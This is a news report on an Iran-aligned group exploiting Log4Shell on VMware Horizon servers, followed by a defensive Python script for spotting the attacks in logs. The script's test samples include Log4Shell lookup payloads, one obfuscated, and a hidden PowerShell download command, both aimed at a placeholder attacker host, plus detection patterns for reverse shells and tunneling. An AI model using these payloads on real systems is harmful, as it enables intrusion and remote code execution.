The Hacker News (THN:F25FAD25E15EBBE4934883ABF480294D)
Feb 18, 2022 - 7:40 a.m.

Iranian Hackers Targeting VMware Horizon Log4j Flaws to Deploy Ransomware

2022-02-18 07:40:00
The Hacker News
thehackernews.com
301

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.974 High

EPSS

Percentile

99.9%

VMware Horizon Log4j

A “potentially destructive actor” aligned with the government of Iran is actively exploiting the well-known Log4j vulnerability to infect unpatched VMware Horizon servers with ransomware.

Cybersecurity firm SentinelOne dubbed the group “TunnelVision” owing to its heavy reliance on tunneling tools, and observed overlaps in tactics with those of a broader group tracked under the monikers Phosphorus, Charming Kitten and Nemesis Kitten.

“TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions,” SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky said in a report, with the intrusions detected in the Middle East and the U.S.

Also observed alongside Log4Shell is the exploitation of the Fortinet FortiOS path traversal flaw (CVE-2018-13379) and the Microsoft Exchange ProxyShell vulnerabilities to gain initial access to target networks for post-exploitation.

“TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement,” the researchers said.

The PowerShell commands serve as a launchpad: they download tools such as Ngrok and run further commands through reverse shells, which in turn drop a PowerShell backdoor capable of gathering credentials and executing reconnaissance commands.

SentinelOne also said it identified similarities in the mechanism used to execute the reverse web shell with another PowerShell-based implant called PowerLess that was disclosed by Cybereason researchers earlier this month.

Throughout the activity, the threat actor is said to have used a GitHub repository named “VmWareHorizon” under the username “protections20” to host the malicious payloads.

The cybersecurity company said it’s associating the attacks to a separate Iranian cluster not because they are unrelated, but owing to the fact that “there is at present insufficient data to treat them as identical to any of the aforementioned attributions.”
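The two stages the article describes, Log4Shell lookups sent at unpatched VMware Horizon servers and PowerShell launchers that fetch tunneling tools such as Ngrok, both leave traces a defender can triage. The following is an added example written for this page; it is not SentinelOne's or The Hacker News' code. It de-obfuscates the nested `${lower:...}` / `${::-x}` lookup wrappers attackers use to hide the `jndi:` keyword from naive string matches, and scans PowerShell command lines (including `-EncodedCommand` payloads, which it decodes as UTF-16LE) for tunneling and download indicators. The log lines and command lines are constructed samples, the `attacker.invalid` host is a placeholder, and the indicator names and the GitHub URL form are assumptions made for the example.

```python
"""Defender-side triage helpers for the TunnelVision tradecraft in the article.

Added example, not code from SentinelOne or The Hacker News. All sample
data below is constructed; nothing here is captured from an incident."""
import base64
import re

# Innermost ${...} lookup, i.e. one that contains no further braces.
_INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def _resolve(body: str):
    """Evaluate one Log4j lookup the way the vulnerable resolver would, for the
    wrapper forms commonly used to obscure 'jndi'. Returns None if the lookup is
    not a plain obfuscation wrapper (e.g. the jndi lookup itself)."""
    if ":-" in body:                        # ${anything:-default} and ${::-j} -> default
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.lower() == "lower":   # ${lower:J} -> j
        return value.lower()
    if sep and prefix.lower() == "upper":   # ${upper:i} -> I
        return value.upper()
    return None


def normalize_lookups(text: str) -> str:
    """Collapse nested obfuscating lookups, innermost first, until nothing changes."""
    while True:
        changed = False

        def sub(m):
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)           # keep unresolved lookups verbatim
            changed = True
            return resolved

        text = _INNER_LOOKUP.sub(sub, text)
        if not changed:
            return text


_JNDI = re.compile(r"\$\{jndi:\s*([a-z0-9+.-]+):", re.I)


def detect_log4shell(line: str):
    """Return the JNDI scheme (ldap, rmi, dns, ...) carried by the line after
    de-obfuscation, or None if the line holds no Log4Shell lookup."""
    m = _JNDI.search(normalize_lookups(line))
    return m.group(1).lower() if m else None


# Indicator names are this example's own; the repo/user names come from the
# article, the github.com URL shape is an assumption.
_PS_INDICATORS = {
    "ngrok": re.compile(r"\bngrok\b", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "reverse_shell": re.compile(r"Net\.Sockets\.TCPClient", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "github_staging": re.compile(r"github\.com/protections20/VmWareHorizon", re.I),
}


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded script when -EncodedCommand (base64 of UTF-16LE) is used,
    so indicators inside the encoded payload are also visible to the scan."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline + " " + decoded


def flag_powershell(cmdline: str):
    """Sorted list of indicator names matched by a PowerShell command line."""
    text = decode_encoded_command(cmdline)
    return sorted(name for name, rx in _PS_INDICATORS.items() if rx.search(text))


def triage(log_lines, cmdlines):
    """Run both detectors and report (index, finding) pairs for the hits."""
    return {
        "log4shell_hits": [(i, s) for i, l in enumerate(log_lines) if (s := detect_log4shell(l))],
        "powershell_hits": [(i, f) for i, c in enumerate(cmdlines) if (f := flag_powershell(c))],
    }


# Constructed web-server access log lines (203.0.113.0/24 is a documentation range).
SAMPLE_HORIZON_LOGS = [
    '203.0.113.9 - - [18/Feb/2022:07:40:00 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [18/Feb/2022:07:41:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"',
    '203.0.113.9 - - [18/Feb/2022:07:41:13 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${::-n}${::-d}${upper:i}:${lower:ldap}://attacker.invalid/a}"',
]

# Constructed process command lines; the encoded one wraps a tunnel launch.
_CONSTRUCTED_SCRIPT = "ngrok tcp 3389"
SAMPLE_CMDLINES = [
    'powershell.exe -NoProfile -Command "Get-Date"',
    'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://attacker.invalid/x.ps1 -OutFile x.ps1"',
    "powershell.exe -enc " + base64.b64encode(_CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode(),
]

if __name__ == "__main__":
    print(triage(SAMPLE_HORIZON_LOGS, SAMPLE_CMDLINES))
```

The fixed-point loop matters: a single-pass regex for `${jndi:` misses the third log line entirely, while resolving the wrappers the way Log4j itself would makes the hidden lookup reappear as plain text. The same idea applies to the `-EncodedCommand` branch, since the tunneling keyword only becomes visible after decoding.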

